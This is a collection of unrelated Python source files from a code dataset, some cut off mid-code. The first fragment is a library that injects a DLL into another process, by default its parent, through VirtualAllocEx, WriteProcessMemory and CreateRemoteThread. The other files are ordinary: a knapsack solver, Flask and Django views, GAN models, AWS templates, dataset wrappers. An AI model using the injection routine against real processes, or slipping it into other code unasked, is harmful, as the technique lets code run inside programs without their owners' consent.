super(_RCFuncPtr, self).__setattr__(key, value)
else:
setattr(self._funcptr_, key, value)
def __getattr__(self, key):
return super(_RCFuncPtr, self).__getattr__(key) if\
self._has(key) else\
getattr(self._funcptr_, key)
class RCDLL(object):
_func_flags_ = _FUNCFLAG_CDECL
_func_restype_ = c_int
_hprocess_ = 0
_hthread_ = 0
_exports_ = {}
_funcs_ = {}
def __init__(self, name = None, pid = 0, thid = 0, mode = DEFAULT_MODE, handle = None, use_errno = False,
use_last_error = False):
if name is None and handle is None:
raise WindowsError('We need either a name or a handle to a preloaded DLL to create a DLL interface.')
elif name is None:
self._name = GetModuleFileName(handle)
else:
self._name = name
flags = self._func_flags_
if use_errno:
flags |= _FUNCFLAG_USE_ERRNO
if use_last_error:
flags |= _FUNCFLAG_USE_LASTERROR
self._hthread_ = thid
pi, ti = 0, 0
if pid == 0:
check = _find_parent_process()
if check is None:
raise WinError('Failed to open our parent process and no pid specified.')
pi, ti = check
else:
pi, ti = _bypid(pid)
if self._hthread_ == 0:
self._hthread_ = ti
self._hprocess_ = OpenProcess(PROCESS_MOST, FALSE, pi)
class _FuncPtr(_RCFuncPtr):
_flags_ = flags
_restype_ = self._func_restype_
_hprocess_ = self._hprocess_
self._FuncPtr = _FuncPtr
self._handle = self.__inject__()
if self._handle == 0:
raise WindowsError('Could not inject your library: %s' % self._name)
self.__populate_exports__()
def __inject__(self):
val = create_unicode_buffer(self._name, len(self._name) + 1)
buflen = sizeof(val)
buffer = VirtualAllocEx(self._hprocess_, 0L, buflen, MEM_COMMIT, PAGE_READWRITE)
if buffer == NULL:
raise Exception('Could not allocate our remote buffer.')
if WriteProcessMemory(self._hprocess_, buffer, cast(val, LPCVOID), buflen, ULONG_PTR(0)) == FALSE:
raise Exception('Could not write to our remote variable.')
hRemoteThread = CreateRemoteThread(
self._hprocess_, NULL_SECURITY_ATTRIBUTES, 0,
PLoadLibrary, buffer, 0L, byref(c_ulong(0L))
)
if hRemoteThread == NULL:
VirtualFreeEx(self._hprocess_, buffer, 0, MEM_RELEASE)
CloseHandle(self._hprocess_)
raise WinError('Failed to start our remote thread.')
WaitForSingleObject(hRemoteThread, INFINITE)
result = c_ulong(0)
GetExitCodeThread(hRemoteThread, byref(result))
CloseHandle(hRemoteThread)
VirtualFreeEx(self._hprocess_, buffer, 0, MEM_RELEASE)
return result.value
def __populate_exports__(self):
if len(os.path.splitext(self._name)[1].lower()) == 0:
self._name += '.dll'
pe = pefile.PE(self._name, fast_load = True)
direxport = pe.OPTIONAL_HEADER.DATA_DIRECTORY[0]
exportsobj = pe.parse_export_directory(direxport.VirtualAddress, direxport.Size)
pe.close()
for export in exportsobj.symbols:
self._exports_[export.name] =\
self._exports_[export.ordinal] =\
self._handle + export.address
def __repr__(self):
return "<%s '%s', handle %x at %x>" %\
(self.__class__.__name__, self._name,
(self._handle & (_sys.maxint * 2 + 1)),
id(self) & (_sys.maxint * 2 + 1))
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
raise AttributeError(name)
func = self.__getitem__(name)
super(RCDLL, self).__setattr__(name, func)
self._funcs_[name] = func
#setattr(self, name, func)
return func
def __setattr__(self, key, value):
if key in self._exports_.keys():
self._funcs_[key] = value
else:
super(RCDLL, self).__setattr__(key, value)
def __getitem__(self, name_or_ordinal):
if name_or_ordinal in self._funcs_.keys():
return self._funcs_[name_or_ordinal]
ordinal = isinstance(name_or_ordinal, (int, long))
if not self._exports_.has_key(name_or_ordinal):
if ordinal: raise WindowsError('Could not find address of function at ordinal: %d' % name_or_ordinal)
else: raise WindowsError('Could not find address of function named: %s' % name_or_ordinal)
func = self._FuncPtr(self._exports_[name_or_ordinal], name_or_ordinal, self)
if not ordinal:
func.__name__ = name_or_ordinal
return func
class RPyDLL(RCDLL):
"""This class represents the Python library itself. It allows to
access Python API functions. The GIL is not released, and
Python exceptions are handled correctly.
"""
_func_flags_ = _FUNCFLAG_CDECL | _FUNCFLAG_PYTHONAPI
class RWinDLL(RCDLL):
"""This class represents a dll exporting functions using the
Windows stdcall calling convention.
"""
_func_flags_ = _FUNCFLAG_STDCALL
rcdll = LibraryLoader(RCDLL)
rwindll = LibraryLoader(RWinDLL)
rpydll = LibraryLoader(RPyDLL)
if __name__ == '__main__':
testdll = RCDLL('testdll.dll')
Initialize = testdll.Initialize
Initialize.restype = None
Initialize.argtypes = []
Initialize()
testdll.Finalize()
| StarcoderdataPython |
3380222 | <reponame>fredricksimi/leetcode
"""
Knapsack Problem:
You're given an array of arrays where each subarray holds two integer values and represents an item;
the first integer is the item's value, and the second integer is the item's weight.
You're also given an integer representing the maximum capacity of a knapsack that you have.
Your goal is to fit items in your knapsack without having the sum of their weights exceed the knapsack's capacity,
all the while maximizing their combined value. Note that you only have one of each item at your disposal.
Write a function that returns the maximized combined value of the items that you should pick as well as an array of the indices of each item picked.
If there are multiple combinations of items that maximize the total value in the knapsack, your function can return any of them.
https://www.algoexpert.io/questions/Knapsack%20Problem
"""
# O(2^n) time | O(n) space
def knapsackProblem(items, capacity, idx=0, added=[]):
if idx >= len(items):
return [0, added]
curr_weight = items[idx][1]
curr_value = items[idx][0]
if curr_weight > capacity:
result = knapsackProblem(items, capacity, idx+1, added) # skip current
else:
# add current to knapsack
not_skip = knapsackProblem(
items, capacity-curr_weight, idx+1, added + [idx])
not_skip[0] = curr_value + not_skip[0]
skip = knapsackProblem(items, capacity, idx+1, added) # skip current
if skip[0] > not_skip[0]:
result = skip
else:
result = not_skip
return result
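# Hedged usage sketch (the item list below is made-up sample data, each entry being
# [value, weight]):
#
#   knapsackProblem([[1, 2], [4, 3], [5, 6], [6, 7]], 10)
#   # -> [10, [1, 3]]  (items 1 and 3: value 4 + 6, weight 3 + 7 fits the capacity)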
| StarcoderdataPython |
3315217 | interaction_model = "stream"
def bidirectional(stream):
return (item.upper() for item in stream)
def filter(stream):
return (item for item in stream if "foo" in item)
def source():
from itertools import count
    return (str(item) for item in count())
| StarcoderdataPython |
4802037 | from flask import render_template,request,redirect,url_for
from . import main
from app.request import getRequest
rqst = getRequest()
@main.route('/')
def index():
'''
Highlight root page function that returns the index page and its data
'''
sources = rqst.get_sources('tech')
if sources:
return render_template("index.html", sources=sources)
@main.route('/view/<int:view_id>')
def view(id):
'''
news root page function that returns the index page and its data
'''
| StarcoderdataPython |
152858 | <reponame>hadleyhzy34/GANs-practice
# -*- coding: utf-8 -*-
import torch.nn as nn
class discriminator(nn.Module):
def __init__(self):
super(discriminator, self).__init__()
self.main = nn.Sequential(
nn.Linear(784, 256),
nn.LeakyReLU(0.2),
nn.Linear(256, 256),
nn.LeakyReLU(0.2),
nn.Linear(256, 1),
nn.Sigmoid()
)
def forward(self, input):
return self.main(input)
class generator(nn.Module):
def __init__(self):
super(generator, self).__init__()
self.main = nn.Sequential(
nn.Linear(128, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 784),
nn.Tanh()
)
def forward(self, input):
return self.main(input)
| StarcoderdataPython |
3326869 | from statzcw import zvariance
from math import sqrt
def stddev(in_list):
"""
Calculates standard deviation of given list
:param in_list: list of values
:return: float rounded to 5 decimal places
"""
var = zvariance.variance(in_list)
std_dev = sqrt(var)
return round(std_dev, 5)
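# Illustrative worked example (assuming zvariance.variance computes the population
# variance): for [2, 4, 4, 4, 5, 5, 7, 9] the variance is 4.0, so stddev returns 2.0.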
| StarcoderdataPython |
151824 | <reponame>hitchtest/hitchstory<gh_stars>10-100
def email_was_sent():
print("Email was sent")
| StarcoderdataPython |
3271763 | <filename>pyecs/__init__.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from entity import Entity
from events import Events
from component import Component
from .decorators import *
from . import components
from application import Application, profile
version = "0.0.11" | StarcoderdataPython |
1618704 | <filename>src/prostatex/preprocessing.py
import numpy
from numpy import pad
import math
from constants import Variables
from prostatex.model import Image
from prostatex.normalization import NormalizationMean, NormalizationFeatureScaling, NormalizationMedian
from scipy.ndimage.interpolation import zoom
def roi_mm(image: Image, image_data: numpy.ndarray, ij_width: float, k_width: float, do_interpolate=False):
i, j, k = image.ijk()
i, j, k = i, j, k
ivs, jvs, kvs = image.spacing()
i_margin = int(math.ceil(ij_width / (2 * ivs))) + Variables.width_crop
j_margin = int(math.ceil(ij_width / (2 * jvs))) + Variables.width_crop
k_margin = int(math.floor(k_width / (2 * kvs))) + Variables.depth_crop
image_data = pad(image_data, ((i_margin, i_margin), (j_margin, j_margin), (k_margin, k_margin)), mode='constant')
img_shape = image_data.shape
i_from = max(0, i)
i_to = min(img_shape[0], i + 2 * i_margin)
j_from = max(0, j)
j_to = min(img_shape[1], j + 2 * j_margin)
k_from = max(0, k)
k_to = min(img_shape[2], k + 2 * k_margin +1)
if k_margin == 0:
roi_arr = image_data[i_from:i_to, j_from:j_to, min(img_shape[2]-1,k_from)]
return roi_arr[:,:,None] # add additional dimension to array
return image_data[i_from:i_to, j_from:j_to, k_from:k_to]
def clean_outliers(image_img):
perc_bounds = numpy.percentile(image_img, [1, 99])
p_low = perc_bounds[0]
p_high = perc_bounds[1]
image_img[image_img <= p_low] = p_low
image_img[image_img >= p_high] = p_high
return image_img
def get_roi_in_mm(model,modality,ij_width_mm=30,k_width_mm=0, do_interpolate=False):
try:
if modality in model.images:
image = model.images[modality]
image_img = image.imgdata()
image_img = clean_outliers(image_img)
#image_img = NormalizationMean().normalize(image_img)
image_img = NormalizationMedian().normalize(image_img)
image_img = NormalizationFeatureScaling(vmin=0.0,vmax=1.0).normalize(image_img)
img = roi_mm(image,image_img,ij_width_mm,k_width_mm, do_interpolate)
if do_interpolate:
zoom_factor = [ z/min(image.spacing()) for z in image.spacing()]
img = zoom(img, zoom_factor)
return img
except Exception as e:
print(model.id(), modality, e)
return None
def pad_zero(matrix, target_shape):
pads = []
matrix_update = matrix.copy()
if matrix is None:
return numpy.zeros(shape=target_shape)
for n in range(len(matrix.shape)):
dim = matrix.shape[n]
target_dim = target_shape[n]
dim_pad_lo = int(numpy.floor((target_dim-dim)/2))
dim_pad_hi = int(numpy.ceil((target_dim-dim)/2))
if dim_pad_lo < 0 or dim_pad_hi < 0:
from_lo = abs(dim_pad_lo)
from_high = abs(dim_pad_hi)
indices = range(0,dim)[from_lo:-from_high]
matrix_update = numpy.take(matrix_update,indices,axis=n)
#print('pad_zero',matrix.shape,target_shape)
for n in range(len(matrix_update.shape)):
dim = matrix_update.shape[n]
target_dim = target_shape[n]
dim_pad_lo = int(numpy.floor((target_dim-dim)/2))
dim_pad_hi = int(numpy.ceil((target_dim-dim)/2))
pads.append((dim_pad_lo, dim_pad_hi))
return pad(matrix_update, pads, mode='constant')
| StarcoderdataPython |
3211867 | from .api.client import OpenFinClient
from .api.key import SubKey
from .exceptions import OpenFinWebSocketException
__VERSION__ = "0.1.0"
| StarcoderdataPython |
189383 | def user_selection(message, options):
# taken from https://github.com/Asana/python-asana/blob/master/examples/example-create-task.py
option_list = list(options)
print(message)
for i, option in enumerate(option_list):
print(i, ": " + option["name"])
index = int(input("Enter choice (default 0): ") or 0)
return option_list[index]
| StarcoderdataPython |
63703 | # coding:utf-8
import csv
from bs4 import BeautifulSoup
import requests
if __name__ == '__main__':
user_agent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1'
headers = {'User-Agent': user_agent}
r = requests.get('http://seputu.com/', headers=headers)
soup = BeautifulSoup(r.text, 'html.parser')
lisit = []
for mulu in soup.find_all(class_='mulu'):
h2 = mulu.find('h2')
        if h2 is not None:
h2_title = h2.string
for a in mulu.find(class_='box').find_all('a'):
href = a.get('href')
box_title = a.string
lisit.append((h2_title, box_title, href))
    headers_ = ['Title', 'Chapter', 'Link']  # a list keeps the header column order deterministic
with open('qiye.csv', 'w', newline='') as fp:
        # csv needs newline='' here, otherwise a blank line appears between rows
f_csv = csv.writer(fp)
f_csv.writerow(headers_)
f_csv.writerows(lisit)
| StarcoderdataPython |
172767 | from .value_empty import ValueEmpty | StarcoderdataPython |
3303074 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#This software is distributed under the Creative Commons license (CC0) version 1.0. A copy of this license should have been distributed with this software.
#The license can also be read online: <https://creativecommons.org/publicdomain/zero/1.0/>. If this online license differs from the license provided with this software, the license provided with this software should be applied.
"""
Tests the behaviour of the validation and registration functions for
configuration types.
"""
import configurationtype #The module we're testing.
import configurationtype.configuration_error #To test whether ConfigurationError is raised.
import luna.plugins #To check whether a MetadataValidationError is raised.
import luna.tests #For parametrised tests
class IncompleteConfiguration:
"""
A mock class for a configuration type, except that it misses iteration.
"""
def __getattr__(self, *args, **kwargs):
"""
Gets the value of a configuration item. This raises an
``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("An item was requested by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
def __setattr__(self, *args, **kwargs):
"""
Changes the value of a configuration item. This raises an
``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("An item was set by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
def define(self, *args, **kwargs): #pylint: disable=no-self-use
"""
Creates a new configuration item. This raises an ``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("A new item was defined by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
def metadata(self, *args, **kwargs): #pylint: disable=no-self-use
"""
Obtains the metadata of an item. This raises an ``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
:raises AssertionError: Always.
"""
raise AssertionError("Item metadata was requested by the plug-in metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
class ValidConfiguration(IncompleteConfiguration):
"""
A mock class that is a valid implementation of a configuration instance.
"""
def __iter__(self, *args, **kwargs):
"""
Creates an iterator over the class. This raises an ``AssertionError``.
The metadata validator should never call any function on the instance.
:param args: All arguments will be put in the exception's message.
:param kwargs: All arguments will be put in the exception's message.
"""
raise AssertionError("The iteration function was called by the metadata validator with parameters {args} and {kwargs}.".format(args=str(args), kwargs=str(kwargs)))
class TestConfigurationType(luna.tests.TestCase):
"""
Tests the behaviour of the validation and registration functions for
configuration types.
"""
@luna.tests.parametrise({
"define": {"identity": "define"},
"__getattr__": {"identity": "__getattr__"},
"metadata": {"identity": "metadata"}
})
def test_register_clashing(self, identity):
"""
Tests whether registering a plug-in with an identity that clashes
results in a ``ConfigurationError``.
Normally we'd want to test this by patching the configuration API with
some class we made for this test, so that any changes to the API will
not cause false negatives for this test. However, since ``dir()`` is not
transparently patched through when using ``unittest.mock.patch()``, this
is not a viable option this time. We'll have to settle with updating the
test sometimes.
:param identity: The identity of the plug-in to register.
"""
with self.assertRaises(configurationtype.configuration_error.ConfigurationError):
configurationtype.register(identity, {})
@luna.tests.parametrise({
"preferences": {"identity": "preferences"},
"with_digit0": {"identity": "with_digit0"}
}) #pylint: disable=no-self-use
def test_register_safe(self, identity):
"""
Tests whether registering a plug-in with a good identity works.
:param identity: The identity of the plug-in to register.
"""
configurationtype.register(identity, {})
@staticmethod
def test_validate_metadata_correct():
"""
Tests the ``validate_metadata`` function against metadata that is
correct.
"""
configurationtype.validate_metadata({
"configuration": {
"name": "Test Configuration",
"instance": ValidConfiguration()
}
}) #Should not give an exception.
@luna.tests.parametrise({
"no_configuration": {
"metadata": {
"something_else": {}
}
},
"string": {
"metadata": {
"configuration": "not_a_dictionary"
}
},
"integer": {
"metadata": {
"configuration": 1337 #Even the "in" keyword won't work.
}
},
"none": {
"metadata": {
"configuration": None
}
},
"almost_dictionary": {
"metadata": {
"configuration": luna.tests.AlmostDictionary()
}
},
"empty": {
"metadata": {
"configuration": {}
}
},
"missing_name": {
"metadata": {
"instance": ValidConfiguration()
}
},
"missing_instance": {
"metadata": {
"name": "Test Missing Instance"
}
},
"name_not_string": {
"metadata": {
"name": 69,
"instance": ValidConfiguration()
}
},
"instance_none": {
"metadata": {
"name": "Test Instance None",
"instance": None,
}
},
"instance_str": {
"metadata": {
"name": "Test Instance String",
"instance": "Some Text" #Missing __getitem__, deserialise and serialise methods.
}
},
"instance_incomplete": {
"metadata": {
"name": "Test Instance Incomplete",
"instance": IncompleteConfiguration() #Missing __iter__ method.
}
}
})
def test_validate_metadata_incorrect(self, metadata):
"""
Tests the ``validate_metadata`` function against metadata that is
incorrect.
The function is tested with various instances of metadata, all of which
are incorrect. The test expects the function to raise a
``MetadataValidationError``.
:param metadata: Incorrect metadata.
"""
with self.assertRaises(luna.plugins.MetadataValidationError): #Should give this exception.
configurationtype.validate_metadata(metadata) | StarcoderdataPython |
72423 | <filename>kalman/animation.py
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as pl
def draw3d(ax, xyz, R, quadcolor):
# We draw in ENU coordinates, R and xyz are in NED
ax.scatter(xyz[1], xyz[0], -xyz[2], color=quadcolor)
ax.quiver(xyz[1], xyz[0], -xyz[2], R[0, 1], R[0, 0], R[0, 2], pivot='tail', \
color='red')
ax.quiver(xyz[1], xyz[0], -xyz[2], R[1, 1], R[1, 0], R[1, 2], pivot='tail', \
color='green')
ax.quiver(xyz[1], xyz[0], -xyz[2], -R[2, 1], -R[2, 0], -R[2, 2], pivot='tail', \
color='blue')
def draw2d(fig, X, fc, quadcolor):
agents = fc.agents
m = fc.m
pl.figure(fig)
for i in range(0, agents):
if m == 2:
pl.plot(X[m*i], X[m*i+1], 'o'+quadcolor[i])
def draw_edges(fig, X, fc, n):
agents = fc.agents
edges = fc.edges
m = fc.m
B = fc.B
pl.figure(fig)
a, b = 0, 0
for i in range(0, edges):
for j in range(0, agents):
if B[j,i] == 1:
a = j
elif B[j,i] == -1:
b = j
if m == 2:
if i == n:
pl.plot([X[m*a], X[m*b]], [X[m*a+1], X[m*b+1]], 'r--', lw=2)
else:
pl.plot([X[m*a], X[m*b]], [X[m*a+1], X[m*b+1]], 'k--', lw=2)
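
# Minimal usage sketch (not part of the original module): draw a single pose at the NED
# position [1, 2, -3] with an identity attitude matrix. The Axes3D import above is what
# makes the '3d' projection available.
if __name__ == '__main__':
    import numpy as np
    fig = pl.figure()
    ax = fig.add_subplot(111, projection='3d')
    draw3d(ax, np.array([1.0, 2.0, -3.0]), np.eye(3), 'k')
    pl.show()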
| StarcoderdataPython |
105684 | <filename>SC/acme_report.py
from random import randint, sample, uniform
from acme import Product
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
def generate_products():
products = []
for i in range(30):
name = '{}{}'.format(sample(ADJECTIVES, k=1)[0],
sample(NOUNS, k=1)[0])
price = randint(5, 100)
weight = randint(5, 100)
flammability = float('{0:.2f}'.format(uniform(0.0, 2.5)))
prod = Product(name=name, price=price, weight=weight,
flammability=flammability)
products.append(prod)
return products
def inventory_report(products):
    prod_names = [prod.name for prod in products]
print("Unique Product names: ", len(set(prod_names)))
avg_price = sum([prod.price for prod in products]) / len(products)
    avg_weight = sum([prod.weight for prod in products]) / len(products)
avg_flammability = sum([prod.flammability for prod in products]) / len(products)
print("="*42)
print("ACME CORPORATION OFFICIAL INVENTORY REPORT")
print("="*42)
print(f'Average Price: {avg_price:.2f}')
print(f'Average Weight: {avg_weight:.1f} lb')
print(f'Average Flammability: {avg_flammability:.2f}')
if __name__ == '__main__':
inventory_report(generate_products())
| StarcoderdataPython |
92251 |
import urllib
import urllib.parse
import zlib
class Uri:
def __init__(self, scheme: str, hostname: str, port: int, resource: str):
""" Simple Uri (Universal Resource Identifier) class to split/join uri components
format: scheme://hostname:port/resource (e.g. http://stuff.com:1234/personal/addressbook.xml)"""
self.scheme = scheme
self.hostname = hostname
self.port = port
self.resource = resource
@classmethod
def parse(cls, url_string):
""" Create a Uri instance by parsing a url string"""
url = urllib.parse.urlsplit(url_string)
return cls(scheme=url.scheme, hostname=url.hostname, port=url.port, resource=url.path)
def get_url(self, resource=None):
resource = resource if resource else self.resource
fmt = "{scheme}://{hostname}:{port}{resource}" if self.port is not None else "{scheme}://{hostname}{resource}"
return fmt.format(scheme=self.scheme, hostname=self.hostname, port=self.port, resource=resource)
def get_root_url(self):
fmt = "{scheme}://{hostname}:{port}" if self.port is not None else "{scheme}://{hostname}"
return fmt.format(scheme=self.scheme, hostname=self.hostname, port=self.port)
def copy(self, resource=None):
resource = resource if resource else self.resource
return Uri(scheme=self.scheme, hostname=self.hostname, port=self.port, resource=resource)
def __repr__(self):
return "Uri({scheme}, {hostname}, {port}, {resource}".format(**self.__dict__)
def __str__(self):
return self.get_url()
def __hash__(self):
return zlib.adler32(repr(self).encode())
def __eq__(self, other):
if isinstance(other, Uri):
return other.__hash__() == self.__hash__()
def __ne__(self, other):
return not self.__eq__(other) | StarcoderdataPython |
3238185 | <filename>python_schema/field/int_field.py<gh_stars>1-10
from python_schema import exception
from .base_field import BaseField
class IntField(BaseField):
def normalise(self, value):
value = super().normalise(value)
if value is None:
return value
message = f"IntField cannot be populated with value: {value}"
try:
# first convert to str so that 12.2 won't be accepted as integer
value = int(str(value))
except (TypeError, ValueError):
self.errors.append(message)
raise exception.NormalisationError(message)
return value
| StarcoderdataPython |
1781400 |
import sys
with open(sys.argv[1], 'r') as test_cases:
for test in test_cases:
stringe = test.strip()
lista = str(stringe)
lista2 =[]
indices = []
si_no = 0
for i in lista:
lista2.append(int(i))
for j in range (0,len(lista2)):
indices.append(j)
for k in range(0,len(lista2)):
if lista2.count(indices[k]) == lista2[k]:
si_no = 1
else:
si_no = 0
print (si_no) | StarcoderdataPython |
133976 | from nosuch.midiutil import *
from traceback import format_exc
from time import sleep
from nosuch.mididebug import *
from nosuch.midipypm import *
if __name__ == '__main__':
Midi.startup()
# m = MidiDebugHardware()
m = MidiPypmHardware()
a = m.input_devices()
for nm in a:
print "Opening input = ",nm
i = m.get_input(nm)
i.open()
def print_midi(msg,data):
print("MIDI = %s" % str(msg))
Midi.callback(print_midi,"dummy")
try:
while True:
sleep(1.0)
except KeyboardInterrupt:
print "Got KeyboardInterrupt!"
except:
print "Unexpected exception: %s" % format_exc()
Midi.shutdown()
print "End of midimon.py"
| StarcoderdataPython |
3237392 | from .Inventory import *
import globals as G
import EventHandler
class hotbar(Inventory):
def __init__(self):
Inventory.__init__(self)
EventHandler.eventhandler.on_event("on_draw_2D", self.draw)
def getSlots(self):
y = 27
return [
Slot(197, y),
Slot(239, y),
Slot(281, y),
Slot(323, y),
Slot(365, y),
Slot(407, y),
Slot(449, y),
Slot(491, y),
Slot(533, y),
]
def getImage(self):
return "./assets/textures/gui/hotbar_image.png"
def getImagePos(self):
return (180, 10)
def mouseOut(self):
return False
def drawBefore(self):
return [1, 2]
def getId(self):
return 1
handler.register(hotbar)
| StarcoderdataPython |
1743418 | # Copyright (c) 2012-2013, <NAME> <<EMAIL>>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSHelperFn, AWSObject, AWSProperty
from .validators import boolean, integer, positive_integer
EC2_INSTANCE_LAUNCH = "autoscaling:EC2_INSTANCE_LAUNCH"
EC2_INSTANCE_LAUNCH_ERROR = "autoscaling:EC2_INSTANCE_LAUNCH_ERROR"
EC2_INSTANCE_TERMINATE = "autoscaling:EC2_INSTANCE_TERMINATE"
EC2_INSTANCE_TERMINATE_ERROR = "autoscaling:EC2_INSTANCE_TERMINATE_ERROR"
TEST_NOTIFICATION = "autoscaling:TEST_NOTIFICATION"
class Tag(AWSHelperFn):
def __init__(self, key, value, propogate):
self.data = {
'Key': key,
'Value': value,
'PropagateAtLaunch': propogate,
}
def JSONrepr(self):
return self.data
class NotificationConfiguration(AWSProperty):
props = {
'TopicARN': (basestring, True),
'NotificationTypes': (list, True),
}
class AutoScalingGroup(AWSObject):
type = "AWS::AutoScaling::AutoScalingGroup"
props = {
'AvailabilityZones': (list, True),
'Cooldown': (integer, False),
'DesiredCapacity': (integer, False),
'HealthCheckGracePeriod': (int, False),
'HealthCheckType': (basestring, False),
'LaunchConfigurationName': (basestring, True),
'LoadBalancerNames': (list, False),
'MaxSize': (positive_integer, True),
'MinSize': (positive_integer, True),
'NotificationConfiguration': (NotificationConfiguration, False),
'Tags': (list, False), # Although docs say these are required
'VPCZoneIdentifier': (list, False),
}
def validate(self):
if 'UpdatePolicy' in self.resource:
update_policy = self.resource['UpdatePolicy']
if int(update_policy.MinInstancesInService) >= int(self.MaxSize):
raise ValueError(
"The UpdatePolicy attribute "
"MinInstancesInService must be less than the "
"autoscaling group's MaxSize")
return True
class LaunchConfiguration(AWSObject):
type = "AWS::AutoScaling::LaunchConfiguration"
props = {
'AssociatePublicIpAddress': (boolean, False),
'BlockDeviceMappings': (list, False),
'EbsOptimized': (boolean, False),
'IamInstanceProfile': (basestring, False),
'ImageId': (basestring, True),
'InstanceMonitoring': (boolean, False),
'InstanceType': (basestring, True),
'KernelId': (basestring, False),
'KeyName': (basestring, False),
'RamDiskId': (basestring, False),
'SecurityGroups': (list, False),
'SpotPrice': (basestring, False),
'UserData': (basestring, False),
}
class ScalingPolicy(AWSObject):
type = "AWS::AutoScaling::ScalingPolicy"
props = {
'AdjustmentType': (basestring, True),
'AutoScalingGroupName': (basestring, True),
'Cooldown': (integer, False),
'ScalingAdjustment': (basestring, True),
}
class Trigger(AWSObject):
type = "AWS::AutoScaling::Trigger"
props = {
'AutoScalingGroupName': (basestring, True),
'BreachDuration': (integer, True),
'Dimensions': (list, True),
'LowerBreachScaleIncrement': (integer, False),
'LowerThreshold': (integer, True),
'MetricName': (basestring, True),
'Namespace': (basestring, True),
'Period': (integer, True),
'Statistic': (basestring, True),
'Unit': (basestring, False),
'UpperBreachScaleIncrement': (integer, False),
'UpperThreshold': (integer, True),
}
class EBSBlockDevice(AWSProperty):
props = {
'SnapshotId': (basestring, False),
'VolumeSize': (integer, False),
}
class BlockDeviceMapping(AWSProperty):
props = {
'DeviceName': (basestring, True),
'Ebs': (EBSBlockDevice, False),
'VirtualName': (basestring, False),
}
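
# Illustrative only (not part of the upstream module): Tag serialises straight to the
# CloudFormation shape, including the PropagateAtLaunch flag.
if __name__ == '__main__':
    tag = Tag('Role', 'worker', True)
    print(tag.JSONrepr())  # {'Key': 'Role', 'Value': 'worker', 'PropagateAtLaunch': True}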
| StarcoderdataPython |
1645153 | import sys
import os
import os.path as osp
from torchvision.datasets import CIFAR10 as TVCIFAR10
from torchvision.datasets import CIFAR100 as TVCIFAR100
from torchvision.datasets import SVHN as TVSVHN
import knockoff.config as cfg
from torchvision.datasets.utils import check_integrity
import pickle
class CIFAR10(TVCIFAR10):
base_folder = 'cifar-10-batches-py'
meta = {
'filename': 'batches.meta',
'key': 'label_names',
'md5': '5ff9c542aee3614f3951f8cda6e48888',
}
def __init__(self, train=True, transform=None, target_transform=None, download=False):
# root = osp.join(cfg.DATASET_ROOT, 'cifar10')
root = "/home/zzq/Dataset/"
super().__init__(root, train, transform, target_transform, download)
def get_image(self, index):
return self.data[index]
class CIFAR100(TVCIFAR100):
base_folder = 'cifar-100-python'
meta = {
'filename': 'meta',
'key': 'fine_label_names',
'md5': '7973b15100ade9c7d40fb424638fde48',
}
def __init__(self, train=True, transform=None, target_transform=None, download=False):
root = osp.join(cfg.DATASET_ROOT, 'cifar100')
super().__init__(root, train, transform, target_transform, download)
def get_image(self, index):
return self.data[index]
class SVHN(TVSVHN):
def __init__(self, train=True, transform=None, target_transform=None, download=False):
root = osp.join(cfg.DATASET_ROOT, 'svhn')
# split argument should be one of {‘train’, ‘test’, ‘extra’}
if isinstance(train, bool):
split = 'train' if train else 'test'
else:
split = train
super().__init__(root, split, transform, target_transform, download) | StarcoderdataPython |
3210793 | <filename>website/backend/webserver/api/views/model_classes.py
from django.http import JsonResponse
from ..models import Project, ModelClass, DefaultAttribute
import json
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from pprint import pprint
import pathlib
import os
@csrf_exempt
@require_POST
def create_or_update_model_class(request):
body = json.loads(request.body)
project = Project.objects.filter(id=int(body['project'])).first()
if project is None:
return JsonResponse({'error': 'project could not be found'})
key = body['name'].replace(' ', '_').replace('-','_')
model_class = ModelClass.objects.filter(key=key, project=project).first()
if model_class is None:
model_class = ModelClass.objects.create(
key=key,
label=body['name'],
description=body['description'],
project=project,
run_step_code=body['run_step_code'])
else:
model_class.key = key
model_class.label = body['name']
model_class.description = body['description']
# project=project
        print("inputted run_step code:")
model_class.run_step_code = body['run_step_code']
model_class.save()
for param in body['parameters']:
param['kind'] = 'param'
for state in body['states']:
state['kind'] = 'state'
for item in body['parameters'] + body['states']:
default_attr = DefaultAttribute.objects.filter(model_class=model_class, key=item['key'], kind=item['kind']).first()
if default_attr is None:
DefaultAttribute.objects.create(
key=item['key'],
label=item['label'],
dtype=item['dtype'],
units=item.get('units'),
kind=item['kind'],
is_private=item.get('private', False),
value=str(item['value']),
confidence=item.get('confidence', 0),
notes=item.get('notes', ''),
source=item.get('source', ''),
model_class=model_class
)
else:
default_attr.key=item['key']
default_attr.label=item['label']
default_attr.dtype=item['dtype']
default_attr.units=item.get('units')
default_attr.kind=item['kind']
default_attr.is_private=item.get('private', False)
default_attr.value=str(item['value'])
default_attr.confidence=item.get('confidence', 0)
default_attr.notes=item.get('notes', '')
default_attr.source=item.get('source', '')
